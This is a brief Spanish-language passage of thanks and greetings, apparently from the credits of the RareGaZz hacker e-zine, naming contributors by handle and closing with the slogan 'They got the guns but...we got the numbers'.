Manuel Luna(cicese) por sus excelentes ideas y groovy filosofia. Nice Girl: Dulce. Exiliado: Extreme *ahora Thunder Lord y en tlord@usa.net* Comentario: Gracias a Expedition quien me ayudo un chingo despues de mi pequeño incidente con la ley >:-} <<::RareGaZz::>> "They got the guns but...we got the numbers"